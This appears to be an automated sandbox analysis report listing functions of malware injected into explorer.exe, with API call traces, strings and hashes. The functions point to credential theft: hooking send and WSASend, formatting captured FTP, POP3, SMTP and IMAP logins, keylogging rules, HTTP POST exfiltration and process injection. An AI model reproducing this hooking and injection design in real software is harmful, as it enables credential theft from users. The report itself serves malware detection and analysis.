Instruction ID: 7f452f9592007bb3c144194148aba7a1eb0ba6dab2808c263083eaf0079848e1
Opcode Fuzzy Hash: 1cae8a815ff229c0a92f7b65d34545911217e790a62a22962ca112030f46eae8
Instruction Fuzzy Hash: 9C619B31205314AFD322DF25AD84E6BBBECEB98750F01461CF94A92251DB74DE058BA2

Function 0032263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0032265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00322672
lstrlen.KERNEL32(?,00000000), ref: 0032267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00322685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0032269F
wsprintfA.USER32 ref: 003226B6
CryptDestroyHash.ADVAPI32(?), ref: 003226CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 003226D9

Strings

%02X, xrefs: 003226B0

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 1cd98bd2ff3e0d43db62e48c3d7521997f95c043c12acc3c8864579a463b0a41
Instruction ID: b9ac4f05ca78a35ff4d309c1d42f9ac82b573a79160b68a2ece707189410d9b8
Opcode Fuzzy Hash: 1cd98bd2ff3e0d43db62e48c3d7521997f95c043c12acc3c8864579a463b0a41
Instruction Fuzzy Hash: D611FB72A00108BFDB229B95EC88EEEBFBCEB44741F108069F606E2150D6755F569B74

Function 00321332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0032109E,?,00321010), ref: 0032134A
GetCurrentProcessId.KERNEL32(00000003,?,0032109E,?,00321010), ref: 0032135B
wsprintfA.USER32 ref: 00321372

Part of subcall function 0032263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0032265A
Part of subcall function 0032263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00322672
Part of subcall function 0032263E: lstrlen.KERNEL32(?,00000000), ref: 0032267A
Part of subcall function 0032263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00322685
Part of subcall function 0032263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0032269F
Part of subcall function 0032263E: wsprintfA.USER32 ref: 003226B6
Part of subcall function 0032263E: CryptDestroyHash.ADVAPI32(?), ref: 003226CF
Part of subcall function 0032263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003226D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00321389
GetLastError.KERNEL32 ref: 0032138F
Sleep.KERNEL32(000001F4), ref: 003213A1

Part of subcall function 003224D5: GetCurrentProcessId.KERNEL32 ref: 003224E7
Part of subcall function 003224D5: GetCurrentThreadId.KERNEL32 ref: 003224EF
Part of subcall function 003224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003224FF
Part of subcall function 003224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0032250D
Part of subcall function 003224D5: CloseHandle.KERNEL32(00000000), ref: 00322566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 003213B8
GetProcAddress.KERNEL32(00000000), ref: 003213BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 003213E4
GetProcAddress.KERNEL32(00000000), ref: 003213EB

Part of subcall function 00321DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00321E1D

RtlExitUserThread.NTDLL(00000000), ref: 0032141D

Strings

WSASend, xrefs: 003213DA
send, xrefs: 003213AE
ws2_32.dll, xrefs: 003213B3, 003213DF
%s%d%d%d, xrefs: 0032136C

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 970941ae62067530b63f284c5f31ad537a81ee2beb06634ef178f7dc3a41900d
Instruction ID: 63051e3e9fd1fe92e6c793ba6b19e9e973aa847946bb70dc97499edb3658273e
Opcode Fuzzy Hash: 970941ae62067530b63f284c5f31ad537a81ee2beb06634ef178f7dc3a41900d
Instruction Fuzzy Hash: 2A315C31740234B7CB237F61FD0AFAF3669AF55741F018418F5065B191CF799A5287A1

Function 00321647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00324220,?,?), ref: 00321679
lstrlen.KERNEL32(?), ref: 00321686
getpeername.WS2_32(?,?,?), ref: 003216A0
inet_ntoa.WS2_32(?), ref: 003216B1
htons.WS2_32(?), ref: 003216BF
wsprintfA.USER32 ref: 00321725

Strings

ftp://%s:%s@%s:%d, xrefs: 00321708
pop3://%s:%s@%s:%d, xrefs: 00321701
smtp://%s:%s@%s:%d, xrefs: 003216F3, 00321723
imap://%s:%s@%s:%d, xrefs: 003216FA

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: e6d4001e9adf17a1cab5a3f80757b7935dfc154eb3be5388c171a9374a47ee6c
Instruction ID: ff1e61adb7fdf579f0757f31886a8b652cef9f3c1ea4ddcbe99bb4cdd50aeb24
Opcode Fuzzy Hash: e6d4001e9adf17a1cab5a3f80757b7935dfc154eb3be5388c171a9374a47ee6c
Instruction Fuzzy Hash: 5921F736E00329A7DF135EBDEE885BE7ABD9BA5301F094079E845E3111CA39CE019B60

Function 00321752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00321539,?,?,?,0032144B,?), ref: 00321763
GetProcAddress.KERNEL32(00000000), ref: 0032176A
RtlZeroMemory.NTDLL(00324228,00000104), ref: 00321788
RtlZeroMemory.NTDLL(00324118,00000104), ref: 00321790
RtlZeroMemory.NTDLL(00324330,00000104), ref: 00321798
RtlZeroMemory.NTDLL(00324000,00000104), ref: 003217A1

Strings

%s%s%s%s, xrefs: 003217B3
ntdll.dll, xrefs: 0032175A
sscanf, xrefs: 00321755

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: 83e1e1fb19adb6929076c109104f43282b2bcb4613d33cdba945e27bc2d93605
Instruction ID: de2d40660accd80bb0aba6186c161acace9de154088be6073ce1816c3ae356af
Opcode Fuzzy Hash: 83e1e1fb19adb6929076c109104f43282b2bcb4613d33cdba945e27bc2d93605
Instruction Fuzzy Hash: 34F08932B8033C73812362AABC06CC7BD5CC551FA67074555F60563141D999790149F5

Function 003224D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 003224E7
GetCurrentThreadId.KERNEL32 ref: 003224EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003224FF
Thread32First.KERNEL32(00000000,0000001C), ref: 0032250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0032252C
SuspendThread.KERNEL32(00000000), ref: 0032253C
CloseHandle.KERNEL32(00000000), ref: 0032254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 0032255B
CloseHandle.KERNEL32(00000000), ref: 00322566

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 894c9a965039bb2cb689eb7f704da8471cdc7dd3412ff0aa2c34244e83a49f8b
Instruction ID: 9718c0f2fc4de617a77799c7f3dfac95802bc072810ffc0efb08711e5d019736
Opcode Fuzzy Hash: 894c9a965039bb2cb689eb7f704da8471cdc7dd3412ff0aa2c34244e83a49f8b
Instruction Fuzzy Hash: C3113C71504211EFD7229F61BC4CB6FBBACFF86B01F14851DF64292150D7388A0A9BB2

Function 00321F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B

Part of subcall function 003227E2: lstrlen.KERNEL32(003240DA,?,00000000,00000000,00321F86,74DE8A60,003240DA,00000000), ref: 003227EA
Part of subcall function 003227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,003240DA,00000001,00000000,00000000), ref: 003227FC

Part of subcall function 00322374: RtlZeroMemory.NTDLL(?,00000018), ref: 00322386

RtlZeroMemory.NTDLL(?,0000003C), ref: 00321FE2
wsprintfW.USER32 ref: 0032211B
wsprintfW.USER32 ref: 00322186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00322250

Strings

POST, xrefs: 003220CC
Accept: */*Referer: %S, xrefs: 00322111
Content-Type: application/x-www-form-urlencoded, xrefs: 003221AA
Host: %s, xrefs: 00322180

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 32e3bcc2707b20c3891fef6ddb61959757dea9c0fef54fd03fa9d74db4469072
Instruction ID: aa46de621e2461934d6eeac180b2e08d88a5ffffef72ee6998ae5046f14528de
Opcode Fuzzy Hash: 32e3bcc2707b20c3891fef6ddb61959757dea9c0fef54fd03fa9d74db4469072
Instruction Fuzzy Hash: 6DA17E71608314AFD322DF64EC85A2BBBE8FB88340F10492DF946D7261DA75DE05CB62

Function 003225AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00321287), ref: 003225BF
IsWow64Process.KERNEL32(000000FF,?), ref: 003225D1
IsWow64Process.KERNEL32(00000000,?), ref: 003225E4
CloseHandle.KERNEL32(00000000), ref: 003225FA

Strings

microsoftedgecp.exe, xrefs: 003225AD

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: 82c70fb7446e31503e480d2416dfbb7cbe30afed14eab986944ffe10595852ad
Instruction ID: c0f1ec9cb39257d2899e7df002e82ce0862451516ba83fdf7635085b0b8b1d9b
Opcode Fuzzy Hash: 82c70fb7446e31503e480d2416dfbb7cbe30afed14eab986944ffe10595852ad
Instruction Fuzzy Hash: 3DF09671902228FF9B21CF90AD448EFB76CEF02351F24425DF90192140D7354F05E6B0

Function 00321B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00321B4E
LoadLibraryA.KERNEL32(?,00324434,00000000,00000000,74DF2EE0,00000000,00321910,?,?,?,00000001,?,00000000), ref: 00321B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00321BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00321BF4

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 5e841adffb7d08e2557259767107b5d614e023aaead2da167458e72a5285e349
Instruction ID: e42569d9f457da97cafa6837f5d22befbb840cf8c778029f18e48d759d5ae085
Opcode Fuzzy Hash: 5e841adffb7d08e2557259767107b5d614e023aaead2da167458e72a5285e349
Instruction Fuzzy Hash: 2C31A175700225ABCB2ACF29DA84B76B7E8FF25315F15456CE886C7600E735E846CBA0

Analysis Process: explorer.exePID: 5432, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0072355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 007235D8

Memory Dump Source

Source File: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Offset: 00721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_721000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 39286fce25c46bbaa289fcc459830372d7a1c4451b0d3b5d922c6a61e3c26edc
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: 1311E730711E199FFB5CFBB8A89D27937A0FB14301F54013AA419C76A1DE3D8A41C701

Function 00723220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00723266
Process32First.KERNEL32 ref: 00723289
Process32Next.KERNEL32 ref: 00723532
CloseHandle.KERNELBASE ref: 00723543
SleepEx.KERNELBASE ref: 0072354E

Memory Dump Source

Source File: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Offset: 00721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_721000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: 2c8db0111034d6fc92403bf49fe7bc5c4b07d9cdb02088c45308d6fa9911d108
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 3A8130312186588FE706EF25FC58BEAB7A1FB50740F54466AA447C71A0EF7CEA04CB81

Function 0072A048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0072A147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0072A1BB
VirtualProtect.KERNELBASE ref: 0072A1D9

Memory Dump Source

Source File: 0000001A.00000002.3006599543.0000000000727000.00000040.80000000.00040000.00000000.sdmp, Offset: 00727000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_727000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: b1abab5e3ec9600837689482dac657d64f4ade66c3367d4b3968a6637f0ef2ea
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: A4514732758A3D6BCB34AA38BCC46B9B7D1E755335F18063AD48AC3285F95DD8468383

Analysis Process: explorer.exePID: 3588, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02D51016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D52724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02D529F3,-00000001,02D5128C), ref: 02D52731

Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02D51038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D5106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02D51075
GetCurrentProcessId.KERNEL32(?,02D51010), ref: 02D5107B
wsprintfA.USER32 ref: 02D510E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02D51155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D51160
Process32First.KERNEL32(00000000,?), ref: 02D5117F
CharLowerA.USER32(?), ref: 02D51199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02D511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02D51212
Process32Next.KERNEL32(00000000,00000128), ref: 02D5126C
CloseHandle.KERNELBASE(00000000), ref: 02D5127F
Sleep.KERNELBASE(000003E8), ref: 02D5129F

Strings

explorer.exe, xrefs: 02D511AB
keylog_rules=, xrefs: 02D5110D
|:|, xrefs: 02D51125
microsoftedgecp.exe, xrefs: 02D51208
%s%s, xrefs: 02D510E1

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-2805246637
Opcode ID: 7313ebc53ee9b7545091ddffe33a21b6d7086c5489410c3cb9ef9b8011d35ca1
Instruction ID: b1abf4a8a059108d3a9badbaf6fc694d802e9424844230d069f74caaefe69b99
Opcode Fuzzy Hash: 7313ebc53ee9b7545091ddffe33a21b6d7086c5489410c3cb9ef9b8011d35ca1
Instruction Fuzzy Hash: 7C51E430A443309BDF55AF78E888B3A77AAEF44744F104918AD5987380DBF4DD09CE61

Function 02D510A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

wsprintfA.USER32 ref: 02D510E7

Part of subcall function 02D5276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02D52777
Part of subcall function 02D5276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02D510FE), ref: 02D52789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02D51155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D51160
Process32First.KERNEL32(00000000,?), ref: 02D5117F
CharLowerA.USER32(?), ref: 02D51199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02D511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02D51212
Process32Next.KERNEL32(00000000,00000128), ref: 02D5126C
CloseHandle.KERNELBASE(00000000), ref: 02D5127F
Sleep.KERNELBASE(000003E8), ref: 02D5129F

Strings

explorer.exe, xrefs: 02D511AB
keylog_rules=, xrefs: 02D5110D
|:|, xrefs: 02D51125
microsoftedgecp.exe, xrefs: 02D51208
%s%s, xrefs: 02D510E1

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: 71688346c33785177f3d17e2cf90be7109d4a91e91d840241578127ca2b6de29
Instruction ID: c99a17390d7d7bed239c0d2232727f24c9e9143630651f4657e5fe489bd82797
Opcode Fuzzy Hash: 71688346c33785177f3d17e2cf90be7109d4a91e91d840241578127ca2b6de29
Instruction Fuzzy Hash: 7841D630A443245BDF54EF749889A3E77AAEF88794F004A18AD5687380EFF4DD19CE61

Function 02D59AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D58000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d58000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a54b34bd5fa993069762862445138c5e70903c70d166329de2abf7932eadd0a
Instruction ID: 7dc86af2a1a709961465faa98f8e9db759f7f855900149761e5f9698c74c21c8
Opcode Fuzzy Hash: 6a54b34bd5fa993069762862445138c5e70903c70d166329de2abf7932eadd0a
Instruction Fuzzy Hash: 7F51C3B1A44A62CAEF218A688CE07F5B794EB41225B180729DDE6C73C5E7F45C06C7D0

Function 02D5276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02D52777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02D510FE), ref: 02D52789

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: c232a4563ef61fa24d50d10f1b9822c0d865dae20827bc7facd365808d59ef09
Instruction ID: 7a6c5a877aa81aa9b7a547644de9eb8fa3d7018a0031302f705c12990dc212c6
Opcode Fuzzy Hash: c232a4563ef61fa24d50d10f1b9822c0d865dae20827bc7facd365808d59ef09
Instruction Fuzzy Hash: 1FD0E232B41331ABE6B45E7A6C0CF83AE9DDF86AE1B110025B90DD2240D6A08820C2B0

Function 02D52A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 7a368b786fcbc7a8a13702cda322b36375d4395e0e1b3b6701cfede822662a92
Instruction ID: ad5e4c3a52467a696dd9d63a1aa3afd4e74b21737e13a122268f546da1301ffb
Opcode Fuzzy Hash: 7a368b786fcbc7a8a13702cda322b36375d4395e0e1b3b6701cfede822662a92
Instruction Fuzzy Hash: 98A002B1E903106BDDC55FA8990DF157758AF44781F104D847246C51409DF558649721

Function 02D529BD Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,02D512D9,00000000,00000000,?,00000001), ref: 02D529C7

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0d167c7fef58bbb9ce17e4862f38974d4d531be059276919789d31aba630436f
Instruction ID: fffb6c52e0d9d9803e4e6072f2babddeb31b11e843bf216696fbf4eba83702b3
Opcode Fuzzy Hash: 0d167c7fef58bbb9ce17e4862f38974d4d531be059276919789d31aba630436f
Instruction Fuzzy Hash: F6A002B0FD6310BAFDA99B559D1FF152B189B40F52F204584B30A7C2C056E4B910853D

Function 02D529AE Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,02D513A4), ref: 02D529B6

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4ea226c7f6d12662e99e74db72fc65eecf56b86c7f128e3922a808cccfcbce7c
Instruction ID: 6cbb5963a33651d3060d2f4db90bf955aa098edd949b7779b863320e8fe97505
Opcode Fuzzy Hash: 4ea226c7f6d12662e99e74db72fc65eecf56b86c7f128e3922a808cccfcbce7c
Instruction Fuzzy Hash: F0A00270FD071076EDB55B245D0AF0567546B40B42F304D847245A91C049E5A4588A18

Non-executed Functions

Function 02D518BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D52724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02D529F3,-00000001,02D5128C), ref: 02D52731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02D518F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02D5192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02D519BF
RtlMoveMemory.NTDLL(00000000,02D53638,00000016), ref: 02D519E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02D51A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02D51A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D51A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02D51A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02D51A6B
GetProcAddress.KERNEL32(00000000), ref: 02D51A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51A88
